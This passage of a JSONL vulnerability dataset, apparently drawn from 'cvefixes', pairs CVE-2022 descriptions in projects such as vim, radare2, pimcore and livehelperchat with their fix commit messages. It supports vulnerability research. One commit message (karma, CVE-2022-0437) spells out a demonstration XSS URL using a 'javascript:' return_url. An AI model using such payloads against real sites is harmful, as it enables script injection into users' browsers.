"f4b891c06c14a923561e", "text": "CVE: CVE-2022-0240\n\n[{'lang': 'en', 'value': 'mruby is vulnerable to NULL Pointer Dereference'}]\n\nFix commit: class.c: add `obj->c` check before `prepare_singleton_class()`.", "cve_id": "CVE-2022-0240", "source": "cvefixes", "timestamp": ""} {"id": "6c29b50cf52d481e0b8f", "text": "CVE: CVE-2022-0243\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in NuGet OrchardCore.Application.Cms.Targets prior to 1.2.2.'}]\n\nFix commit: Fix localization and sanitization usages (#11034)", "cve_id": "CVE-2022-0243", "source": "cvefixes", "timestamp": ""} {"id": "60b33ca5a52f46b28c11", "text": "CVE: CVE-2022-0245\n\n[{'lang': 'en', 'value': 'Cross-Site Request Forgery (CSRF) in GitHub repository livehelperchat/livehelperchat prior to 2.0.'}]\n\nFix commit: CSRF tokens", "cve_id": "CVE-2022-0245", "source": "cvefixes", "timestamp": ""} {"id": "727b9f0297786aa4c28f", "text": "CVE: CVE-2022-0251\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.2.10.'}]\n\nFix commit: disallow html entity names on import - follow up to #11217", "cve_id": "CVE-2022-0251", "source": "cvefixes", "timestamp": ""} {"id": "c6e1e70b09e063966b7c", "text": "CVE: CVE-2022-0253\n\n[{'lang': 'en', 'value': \"livehelperchat is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\"}]\n\nFix commit: Do not execute angular title", "cve_id": "CVE-2022-0253", "source": "cvefixes", "timestamp": ""} {"id": "3ea053860450108dfeb0", "text": "CVE: CVE-2022-0261\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4120: block insert goes over the end of the line\n\nProblem: Block insert goes over the end of the line.\nSolution: Handle invalid byte better. Fix inserting the wrong text.", "cve_id": "CVE-2022-0261", "source": "cvefixes", "timestamp": ""} {"id": "08df4e937d612b59e12b", "text": "CVE: CVE-2022-0263\n\n[{'lang': 'en', 'value': 'Unrestricted Upload of File with Dangerous Type in Packagist pimcore/pimcore prior to 10.2.7.'}]\n\nFix commit: [Settings] Validate SVG uploads for branding", "cve_id": "CVE-2022-0263", "source": "cvefixes", "timestamp": ""} {"id": "7c91ec78bc6f5973b220", "text": "CVE: CVE-2022-0265\n\n[{'lang': 'en', 'value': 'Improper Restriction of XML External Entity Reference in GitHub repository hazelcast/hazelcast in 5.1-BETA-1.'}]\n\nFix commit: Add helper method to XmlUtil to enable XXE protection in the SAXParserFactory and XMLInputFactory (#20407)", "cve_id": "CVE-2022-0265", "source": "cvefixes", "timestamp": ""} {"id": "6fc6f723fa28eba62cab", "text": "CVE: CVE-2022-0266\n\n[{'lang': 'en', 'value': 'Authorization Bypass Through User-Controlled Key in Packagist remdex/livehelperchat prior to 3.92v.'}]\n\nFix commit: Display logic should match backand logic", "cve_id": "CVE-2022-0266", "source": "cvefixes", "timestamp": ""} {"id": "26121d7bfdf4bf3570c8", "text": "CVE: CVE-2022-0268\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist getgrav/grav prior to 1.7.28.'}]\n\nFix commit: Fixed XSS check not detecting escaped `:`", "cve_id": "CVE-2022-0268", "source": "cvefixes", "timestamp": ""} {"id": "786a7e0fd008def20525", "text": "CVE: CVE-2022-0269\n\n[{'lang': 'en', 'value': 'Cross-Site Request Forgery (CSRF) in Packagist yetiforce/yetiforce-crm prior to 6.3.0.'}]\n\nFix commit: Improved CSRF protection", "cve_id": "CVE-2022-0269", "source": "cvefixes", "timestamp": ""} {"id": "e4f953f2429dea210a75", "text": "CVE: CVE-2022-0272\n\n[{'lang': 'en', 'value': 'Improper Restriction of XML External Entity Reference in GitHub repository detekt/detekt prior to 1.20.0.'}]\n\nFix commit: Parse Baseline in a secure way (#4499)", "cve_id": "CVE-2022-0272", "source": "cvefixes", "timestamp": ""} {"id": "fe43cbde20fb876ff26e", "text": "CVE: CVE-2022-0273\n\n[{'lang': 'en', 'value': 'Improper Access Control in Pypi calibreweb prior to 0.6.16.'}]\n\nFix commit: Prevent creating a public shelf without permission", "cve_id": "CVE-2022-0273", "source": "cvefixes", "timestamp": ""} {"id": "2efae30399b8fccf24d1", "text": "CVE: CVE-2022-0274\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in NuGet OrchardCore.Application.Cms.Targets prior to 1.2.2.'}]\n\nFix commit: Fix localization and sanitization usages (#11034)", "cve_id": "CVE-2022-0274", "source": "cvefixes", "timestamp": ""} {"id": "34d066e9c4217d3c4752", "text": "CVE: CVE-2022-0277\n\n[{'lang': 'en', 'value': 'Improper Access Control in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: search_authors only admins", "cve_id": "CVE-2022-0277", "source": "cvefixes", "timestamp": ""} {"id": "0a7fa4b1ebf2e401c5a7", "text": "CVE: CVE-2022-0278\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: xss on contact form fix", "cve_id": "CVE-2022-0278", "source": "cvefixes", "timestamp": ""} {"id": "726ff0cd965c1842665f", "text": "CVE: CVE-2022-0281\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: search_authors only admins", "cve_id": "CVE-2022-0281", "source": "cvefixes", "timestamp": ""} {"id": "98b04f5591ca99ea2f3e", "text": "CVE: CVE-2022-0282\n\n[{'lang': 'en', 'value': 'Code Injection in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: fix comments xss", "cve_id": "CVE-2022-0282", "source": "cvefixes", "timestamp": ""} {"id": "bade8831c72bb490d877", "text": "CVE: CVE-2022-0285\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist pimcore/pimcore prior to 10.2.9.'}]\n\nFix commit: [Thumbnails] Escape group text properly", "cve_id": "CVE-2022-0285", "source": "cvefixes", "timestamp": ""} {"id": "8838dd2306d974c94cbc", "text": "CVE: CVE-2022-0315\n\n[{'lang': 'en', 'value': 'Insecure Temporary File in GitHub repository horovod/horovod prior to 0.24.0.'}]\n\nFix commit: Replaced use of tempfile.mktemp() with tempfile.mkstemp() (#3358)\n\nSigned-off-by: Abin Shahab ", "cve_id": "CVE-2022-0315", "source": "cvefixes", "timestamp": ""} {"id": "8f7647530e602b8c5cf8", "text": "CVE: CVE-2022-0318\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4151: reading beyond the end of a line\n\nProblem: Reading beyond the end of a line.\nSolution: For block insert only use the offset for correcting the length.", "cve_id": "CVE-2022-0318", "source": "cvefixes", "timestamp": ""} {"id": "52bac6bab70e87e5d639", "text": "CVE: CVE-2022-0319\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4154: ml_get error when exchanging windows in Visual mode\n\nProblem: ml_get error when exchanging windows in Visual mode.\nSolution: Correct end of Visual area when entering another buffer.", "cve_id": "CVE-2022-0319", "source": "cvefixes", "timestamp": ""} {"id": "d1d33c70613a12caa78a", "text": "CVE: CVE-2022-0323\n\n[{'lang': 'en', 'value': 'Improper Neutralization of Special Elements Used in a Template Engine in Packagist mustache/mustache prior to 2.14.1.'}]\n\nFix commit: Fix CVE-2022-0323 (improper neutralization of section names) \n\n- Fixes possible RCE when rendering untrusted user templates.\n- Remove unnecessary comments in generated source.", "cve_id": "CVE-2022-0323", "source": "cvefixes", "timestamp": ""} {"id": "113353a1dd49225428ce", "text": "CVE: CVE-2022-0326\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in Homebrew mruby prior to 3.2.'}]\n\nFix commit: codegen.c: no `OP_HASHADD` required when `val` is false.", "cve_id": "CVE-2022-0326", "source": "cvefixes", "timestamp": ""} {"id": "113f2df9b0c776212bab", "text": "CVE: CVE-2022-0338\n\n[{'lang': 'en', 'value': 'Improper Privilege Management in Conda loguru prior to 0.5.3.'}]\n\nFix commit: Document several security considerations and best practices", "cve_id": "CVE-2022-0338", "source": "cvefixes", "timestamp": ""} {"id": "247a2e352f1bbf4f2b7e", "text": "CVE: CVE-2022-0339\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in Pypi calibreweb prior to 0.6.16.'}]\n\nFix commit: Kobo sync token is now also created if accessed from localhost(fixes #1990)\nCreate kobo sync token button is now \"unclicked\" after closing dialog\nAdditional localhost route is catched\nIf book format is deleted this also deletes the book synced to kobo status", "cve_id": "CVE-2022-0339", "source": "cvefixes", "timestamp": ""} {"id": "7494adb597b90a29dc66", "text": "CVE: CVE-2022-0341\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository vanessa219/vditor prior to 3.8.12.'}]\n\nFix commit: :bug: 所见即所得模式传入字符串 ```
``` 报错 Fix https://github.com/Vanessa219/vditor/issues/1102", "cve_id": "CVE-2022-0341", "source": "cvefixes", "timestamp": ""} {"id": "7a672a245bef8abb3d4e", "text": "CVE: CVE-2022-0348\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist pimcore/pimcore prior to 10.2.'}]\n\nFix commit: added escape function to the icon field", "cve_id": "CVE-2022-0348", "source": "cvefixes", "timestamp": ""} {"id": "cac1e011af4b93d26006", "text": "CVE: CVE-2022-0350\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository vanessa219/vditor prior to 3.8.13.'}]\n\nFix commit: :arrow_up:", "cve_id": "CVE-2022-0350", "source": "cvefixes", "timestamp": ""} {"id": "c43f528da94ad425fb6d", "text": "CVE: CVE-2022-0351\n\n[{'lang': 'en', 'value': 'Access of Memory Location Before Start of Buffer in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4206: condition with many \"(\" causes a crash\n\nProblem: Condition with many \"(\" causes a crash.\nSolution: Limit recursion to 1000.", "cve_id": "CVE-2022-0351", "source": "cvefixes", "timestamp": ""} {"id": "2b2dc764e569f382d1cc", "text": "CVE: CVE-2022-0352\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in Pypi calibreweb prior to 0.6.16.'}]\n\nFix commit: Prevent wrong use of safe statement", "cve_id": "CVE-2022-0352", "source": "cvefixes", "timestamp": ""} {"id": "0f449e4d3ec05611ee3a", "text": "CVE: CVE-2022-0355\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in NPM simple-get prior to 4.0.1.'}]\n\nFix commit: Merge pull request #73 from ranjit-git/master", "cve_id": "CVE-2022-0355", "source": "cvefixes", "timestamp": ""} {"id": "2807d2afa6a2cc7ef947", "text": "CVE: CVE-2022-0359\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4214: illegal memory access with large 'tabstop' in Ex mode\n\nProblem: Illegal memory access with large 'tabstop' in Ex mode.\nSolution: Allocate enough memory.", "cve_id": "CVE-2022-0359", "source": "cvefixes", "timestamp": ""} {"id": "c3b5a86b3f5182889769", "text": "CVE: CVE-2022-0361\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4215: illegal memory access when copying lines in Visual mode\n\nProblem: Illegal memory access when copying lines in Visual mode.\nSolution: Adjust the Visual position after copying lines.", "cve_id": "CVE-2022-0361", "source": "cvefixes", "timestamp": ""} {"id": "36882c11c4addfba7a81", "text": "CVE: CVE-2022-0362\n\n[{'lang': 'en', 'value': 'SQL Injection in Packagist showdoc/showdoc prior to 2.10.3.'}]\n\nFix commit: bug", "cve_id": "CVE-2022-0362", "source": "cvefixes", "timestamp": ""} {"id": "c48b6c8ce5a5f7b33f34", "text": "CVE: CVE-2022-0368\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4217: illegal memory access when undo makes Visual area invalid\n\nProblem: Illegal memory access when undo makes Visual area invalid.\nSolution: Correct the Visual area after undo.", "cve_id": "CVE-2022-0368", "source": "cvefixes", "timestamp": ""} {"id": "4aa603783db6a176cbac", "text": "CVE: CVE-2022-0370\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist remdex/livehelperchat prior to 3.93v.'}]\n\nFix commit: CSRF For personal theme", "cve_id": "CVE-2022-0370", "source": "cvefixes", "timestamp": ""} {"id": "9ce947da195b7f38e772", "text": "CVE: CVE-2022-0372\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist bytefury/crater prior to 6.0.2.'}]\n\nFix commit: Unrestricted php file upload fix (#681)\n\nhttps://huntr.dev/bounties/d7453360-baca-4e56-985f-481275fa38db/", "cve_id": "CVE-2022-0372", "source": "cvefixes", "timestamp": ""} {"id": "2d127388ea7ad125136b", "text": "CVE: CVE-2022-0374\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist remdex/livehelperchat prior to 3.93v.'}]\n\nFix commit: fx #1734", "cve_id": "CVE-2022-0374", "source": "cvefixes", "timestamp": ""} {"id": "b479fc29f54711c1b2b5", "text": "CVE: CVE-2022-0375\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist remdex/livehelperchat prior to 3.93v.'}]\n\nFix commit: fx #1734", "cve_id": "CVE-2022-0375", "source": "cvefixes", "timestamp": ""} {"id": "2047a97c6f761122e9ba", "text": "CVE: CVE-2022-0377\n\n[{'lang': 'en', 'value': 'Users of the LearnPress WordPress plugin before 4.1.5 can upload an image as a profile avatar after the registration. After this process the user crops and saves the image. Then a \"POST\" request that contains user supplied name of the image is sent to the server for renaming and cropping of the image. As a result of this request, the name of the user-supplied image is changed with a MD5 value. This process can be conducted only when type of the image", "cve_id": "CVE-2022-0377", "source": "cvefixes", "timestamp": ""} {"id": "9eb5cecfe35f979f68d1", "text": "CVE: CVE-2022-0378\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: fix xss on module api call in value parameters", "cve_id": "CVE-2022-0378", "source": "cvefixes", "timestamp": ""} {"id": "cd47f0444ae6f8b76052", "text": "CVE: CVE-2022-0379\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: update", "cve_id": "CVE-2022-0379", "source": "cvefixes", "timestamp": ""} {"id": "aff7ed61b561aa244b36", "text": "CVE: CVE-2022-0382\n\n[{'lang': 'en', 'value': \"An information leak flaw was found due to uninitialized memory in the Linux kernel's TIPC protocol subsystem, in the way a user sends a TIPC datagram to one or more destinations. This flaw allows a local user to read some kernel memory. This issue is limited to no more than 7 bytes, and the user cannot control what is read. This flaw affects the Linux kernel versions prior to 5.17-rc1.\"}]\n\nFix commit: net ticp:fix a kernel-infoleak in __tipc_sendmsg(", "cve_id": "CVE-2022-0382", "source": "cvefixes", "timestamp": ""} {"id": "f8613c2d96727aa2e7ff", "text": "CVE: CVE-2022-0387\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist remdex/livehelperchat prior to 3.93v.'}]\n\nFix commit: fix", "cve_id": "CVE-2022-0387", "source": "cvefixes", "timestamp": ""} {"id": "10876fb1237f37aceab8", "text": "CVE: CVE-2022-0392\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4218: illegal memory access with bracketed paste in Ex mode\n\nProblem: Illegal memory access with bracketed paste in Ex mode.\nSolution: Reserve space for the trailing NUL.", "cve_id": "CVE-2022-0392", "source": "cvefixes", "timestamp": ""} {"id": "d0096e2356ed80760435", "text": "CVE: CVE-2022-0393\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4233: crash when recording and using Select mode\n\nProblem: Crash when recording and using Select mode.\nSolution: When deleting the last recorded character check there is something\n to delete.", "cve_id": "CVE-2022-0393", "source": "cvefixes", "timestamp": ""} {"id": "2ab833eecd389a335934", "text": "CVE: CVE-2022-0394\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist remdex/livehelperchat prior to 3.93v.'}]\n\nFix commit: Escape for angular in embed pages", "cve_id": "CVE-2022-0394", "source": "cvefixes", "timestamp": ""} {"id": "81a8e90e09e7c4ea55bc", "text": "CVE: CVE-2022-0395\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist remdex/livehelperchat prior to 3.93v.'}]\n\nFix commit: Escape in user box", "cve_id": "CVE-2022-0395", "source": "cvefixes", "timestamp": ""} {"id": "8f270e545c0be1819b6f", "text": "CVE: CVE-2022-0401\n\n[{'lang': 'en', 'value': 'Path Traversal in NPM w-zip prior to 1.0.12.'}]\n\nFix commit: fix: change output to filename for Disclosure/DoS/RCE", "cve_id": "CVE-2022-0401", "source": "cvefixes", "timestamp": ""} {"id": "7f7dc540d45a5970759f", "text": "CVE: CVE-2022-0405\n\n[{'lang': 'en', 'value': 'Improper Access Control in GitHub repository janeczku/calibre-web prior to 0.6.16.'}]\n\nFix commit: Kobo sync token is now also created if accessed from localhost(fixes #1990)\nCreate kobo sync token button is now \"unclicked\" after closing dialog\nAdditional localhost route is catched\nIf book format is deleted this also deletes the book synced to kobo status", "cve_id": "CVE-2022-0405", "source": "cvefixes", "timestamp": ""} {"id": "d22ae0b4fa48aac8c4f4", "text": "CVE: CVE-2022-0406\n\n[{'lang': 'en', 'value': 'Improper Authorization in GitHub repository janeczku/calibre-web prior to 0.6.16.'}]\n\nFix commit: Upates for new release", "cve_id": "CVE-2022-0406", "source": "cvefixes", "timestamp": ""} {"id": "752ce8268764ecbecce4", "text": "CVE: CVE-2022-0407\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4219: reading before the start of the line\n\nProblem: Reading before the start of the line.\nSolution: Check boundary before trying to read the character.", "cve_id": "CVE-2022-0407", "source": "cvefixes", "timestamp": ""} {"id": "01b8ec8bb80ae342970b", "text": "CVE: CVE-2022-0408\n\n[{'lang': 'en', 'value': 'Stack-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4247: stack corruption when looking for spell suggestions\n\nProblem: Stack corruption when looking for spell suggestions.\nSolution: Prevent the depth increased too much. Add a five second time\n limit to finding suggestions.", "cve_id": "CVE-2022-0408", "source": "cvefixes", "timestamp": ""} {"id": "6a194376224b6f2a6672", "text": "CVE: CVE-2022-0409\n\n[{'lang': 'en', 'value': 'Unrestricted Upload of File with Dangerous Type in Packagist showdoc/showdoc prior to 2.10.2.'}]\n\nFix commit: File upload vulnerability", "cve_id": "CVE-2022-0409", "source": "cvefixes", "timestamp": ""} {"id": "eee6d69eae2e2a3f906d", "text": "CVE: CVE-2022-0413\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4253: using freed memory when substitute with function call\n\nProblem: Using freed memory when substitute uses a recursive function call.\nSolution: Make a copy of the substitute text.", "cve_id": "CVE-2022-0413", "source": "cvefixes", "timestamp": ""} {"id": "5b788f480ae68288074b", "text": "CVE: CVE-2022-0414\n\n[{'lang': 'en', 'value': 'Business Logic Errors in Packagist dolibarr/dolibarr prior to 16.0.'}]\n\nFix commit: Fix #huntr76f3b405-9f5d-44b1-8434-b52b56ee395f", "cve_id": "CVE-2022-0414", "source": "cvefixes", "timestamp": ""} {"id": "b22351a5e01adaa63ba3", "text": "CVE: CVE-2022-0417\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4245: \":retab 0\" may cause illegal memory access\n\nProblem: \":retab 0\" may cause illegal memory access.\nSolution: Limit the value of 'tabstop' to 10000.", "cve_id": "CVE-2022-0417", "source": "cvefixes", "timestamp": ""} {"id": "099e7e6ff284e6da3d8e", "text": "CVE: CVE-2022-0419\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository radareorg/radare2 prior to 5.6.0.'}]\n\nFix commit: Fix null deref in xnu.kernelcache ##crash\n\n* Reported by @xshad3 via huntr.dev", "cve_id": "CVE-2022-0419", "source": "cvefixes", "timestamp": ""} {"id": "c83e83d9facea2604f2c", "text": "CVE: CVE-2022-0430\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository httpie/httpie prior to 3.1.0.'}]\n\nFix commit: Implement new style cookies", "cve_id": "CVE-2022-0430", "source": "cvefixes", "timestamp": ""} {"id": "9255273ee06c43de8555", "text": "CVE: CVE-2022-0432\n\n[{'lang': 'en', 'value': 'Prototype Pollution in GitHub repository mastodon/mastodon prior to 3.5.0.'}]\n\nFix commit: Fixed prototype pollution bug and only allow trusted origin (#17420)", "cve_id": "CVE-2022-0432", "source": "cvefixes", "timestamp": ""} {"id": "ca26d7cfd60eec979f05", "text": "CVE: CVE-2022-0436\n\n[{'lang': 'en', 'value': 'Path Traversal in GitHub repository gruntjs/grunt prior to 1.5.2.'}]\n\nFix commit: Update dependencies, tests...", "cve_id": "CVE-2022-0436", "source": "cvefixes", "timestamp": ""} {"id": "b251fde4a149458d4dc4", "text": "CVE: CVE-2022-0437\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - DOM in NPM karma prior to 6.3.14.'}]\n\nFix commit: fix(security): remove XSS vulnerability in `returnUrl` query param\n\nThe `returnUrl` query parameter can be used to execute malicious code. For\nexample, visiting\n`http://localhost:9876/?return_url=javascript:alert(document.domain)` will\ndisplay an alert.", "cve_id": "CVE-2022-0437", "source": "cvefixes", "timestamp": ""} {"id": "a4e6ddbc5b6f6699eb6a", "text": "CVE: CVE-2022-0443\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4281: using freed memory with :lopen and :bwipe\n\nProblem: Using freed memory with :lopen and :bwipe.\nSolution: Do not use a wiped out buffer.", "cve_id": "CVE-2022-0443", "source": "cvefixes", "timestamp": ""} {"id": "04594e9bfaeaecd6d37b", "text": "CVE: CVE-2022-0451\n\n[{'lang': 'en', 'value': 'Dart SDK contains the HTTPClient in dart:io library whcih includes authorization headers when handling cross origin redirects. These headers may be explicitly set and contain sensitive information. By default, HttpClient handles redirection logic. If a request is sent to example.com with authorization header and it redirects to an attackers site, they might not expect attacker site to receive authorization header. We recommend updating the Dart SDK t", "cve_id": "CVE-2022-0451", "source": "cvefixes", "timestamp": ""} {"id": "09c596457f5db3940a35", "text": "CVE: CVE-2022-0472\n\n[{'lang': 'en', 'value': 'Unrestricted Upload of File with Dangerous Type in Packagist jsdecena/laracom prior to v2.0.9.'}]\n\nFix commit: Fix vulnerability report from hunter.dev", "cve_id": "CVE-2022-0472", "source": "cvefixes", "timestamp": ""} {"id": "f9972ab6d24d3ae5c304", "text": "CVE: CVE-2022-0476\n\n[{'lang': 'en', 'value': 'Denial of Service in GitHub repository radareorg/radare2 prior to 5.6.4.'}]\n\nFix commit: Fix DoS in the minidump parser ##crash\n\n* Reported by lazymio via huntr.dev\n* Reproducer: mdmp-dos", "cve_id": "CVE-2022-0476", "source": "cvefixes", "timestamp": ""} {"id": "3d36dae617351ba881fa", "text": "CVE: CVE-2022-0481\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in Homebrew mruby prior to 3.2.'}]\n\nFix commit: codegen.c: fixed a bug in hash code generation with `!val`.", "cve_id": "CVE-2022-0481", "source": "cvefixes", "timestamp": ""} {"id": "556426db2f2a16303085", "text": "CVE: CVE-2022-0482\n\n[{'lang': 'en', 'value': 'Exposure of Private Personal Information to an Unauthorized Actor in GitHub repository alextselegidis/easyappointments prior to 1.4.3.'}]\n\nFix commit: Release v1.4.3", "cve_id": "CVE-2022-0482", "source": "cvefixes", "timestamp": ""} {"id": "544982fab797f9e6c7d1", "text": "CVE: CVE-2022-0501\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in Packagist ptrofimov/beanstalk_console prior to 1.7.12.'}]\n\nFix commit: Sanitize input", "cve_id": "CVE-2022-0501", "source": "cvefixes", "timestamp": ""} {"id": "1c3ef2d1366e1ff5ec35", "text": "CVE: CVE-2022-0502\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist remdex/livehelperchat prior to 3.93v.'}]\n\nFix commit: Canned messages fixes", "cve_id": "CVE-2022-0502", "source": "cvefixes", "timestamp": ""} {"id": "81299e057c796b12ec67", "text": "CVE: CVE-2022-0504\n\n[{'lang': 'en', 'value': 'Generation of Error Message Containing Sensitive Information in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: update", "cve_id": "CVE-2022-0504", "source": "cvefixes", "timestamp": ""} {"id": "d4f932e2143b329be18a", "text": "CVE: CVE-2022-0505\n\n[{'lang': 'en', 'value': 'Cross-Site Request Forgery (CSRF) in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: Update api.php", "cve_id": "CVE-2022-0505", "source": "cvefixes", "timestamp": ""} {"id": "7855e34ae1509624ac33", "text": "CVE: CVE-2022-0506\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: add css middleware", "cve_id": "CVE-2022-0506", "source": "cvefixes", "timestamp": ""} {"id": "094215b4345e90ea6b29", "text": "CVE: CVE-2022-0508\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository chocobozzz/peertube prior to f33e515991a32885622b217bf2ed1d1b0d9d6832'}]\n\nFix commit: Correctly check import target URL IP", "cve_id": "CVE-2022-0508", "source": "cvefixes", "timestamp": ""} {"id": "b457e9c8b96fed985852", "text": "CVE: CVE-2022-0509\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist pimcore/pimcore prior to 10.3.1.'}]\n\nFix commit: [Admin] Website Settings - Escape grid values properly", "cve_id": "CVE-2022-0509", "source": "cvefixes", "timestamp": ""} {"id": "719b58a8ad24cb22e11a", "text": "CVE: CVE-2022-0510\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in Packagist pimcore/pimcore prior to 10.3.1.'}]\n\nFix commit: [Admin] DataObject - Escape class definitions group properly", "cve_id": "CVE-2022-0510", "source": "cvefixes", "timestamp": ""} {"id": "641357ee0426d52e2a98", "text": "CVE: CVE-2022-0512\n\n[{'lang': 'en', 'value': 'Authorization Bypass Through User-Controlled Key in NPM url-parse prior to 1.5.6.'}]\n\nFix commit: [fix] Correctly handle userinfo containing the at sign", "cve_id": "CVE-2022-0512", "source": "cvefixes", "timestamp": ""} {"id": "baf200c5a1a21c1df6c7", "text": "CVE: CVE-2022-0514\n\n[{'lang': 'en', 'value': 'Business Logic Errors in GitHub repository crater-invoice/crater prior to 6.0.5.'}]\n\nFix commit: Fix tax per item issue & check currency key", "cve_id": "CVE-2022-0514", "source": "cvefixes", "timestamp": ""} {"id": "9f331a7b1c8ee35d4af4", "text": "CVE: CVE-2022-0515\n\n[{'lang': 'en', 'value': 'Cross-Site Request Forgery (CSRF) in GitHub repository crater-invoice/crater prior to 6.0.4.'}]\n\nFix commit: changed route method", "cve_id": "CVE-2022-0515", "source": "cvefixes", "timestamp": ""} {"id": "9338d5f9d2db87f36884", "text": "CVE: CVE-2022-0518\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository radareorg/radare2 prior to 5.6.2.'}]\n\nFix commit: Fix oobread segfault in java arith8.class ##crash\n\n* Reported by Cen Zhang via huntr.dev", "cve_id": "CVE-2022-0518", "source": "cvefixes", "timestamp": ""} {"id": "5ca295486dc3c09e60e6", "text": "CVE: CVE-2022-0519\n\n[{'lang': 'en', 'value': 'Buffer Access with Incorrect Length Value in GitHub repository radareorg/radare2 prior to 5.6.2.'}]\n\nFix commit: Improve boundary checks to fix oobread segfaults ##crash\n\n* Reported by Cen Zhang via huntr.dev\n* Reproducer: bins/fuzzed/javaoob-havoc.class", "cve_id": "CVE-2022-0519", "source": "cvefixes", "timestamp": ""} {"id": "480b9707c1aeafc815f5", "text": "CVE: CVE-2022-0520\n\n[{'lang': 'en', 'value': 'Use After Free in NPM radare2.js prior to 5.6.2.'}]\n\nFix commit: Fix bins/*/rep8 - UAF crash in pyc parser ##crash\n\n* Reported by Cen Zhang via huntr.dev", "cve_id": "CVE-2022-0520", "source": "cvefixes", "timestamp": ""} {"id": "109f10c26954f4a4a236", "text": "CVE: CVE-2022-0521\n\n[{'lang': 'en', 'value': 'Access of Memory Location After End of Buffer in GitHub repository radareorg/radare2 prior to 5.6.2.'}]\n\nFix commit: Improve boundary checks to fix oobread segfaults ##crash\n\n* Reported by Cen Zhang via huntr.dev\n* Reproducer: bins/fuzzed/javaoob-havoc.class", "cve_id": "CVE-2022-0521", "source": "cvefixes", "timestamp": ""} {"id": "c550c29db39dcf37123d", "text": "CVE: CVE-2022-0522\n\n[{'lang': 'en', 'value': 'Access of Memory Location Before Start of Buffer in NPM radare2.js prior to 5.6.2.'}]\n\nFix commit: Fix negative index in anal.arm64.cs ##crash\n\n* Reported by Cen Zhang via huntr.dev", "cve_id": 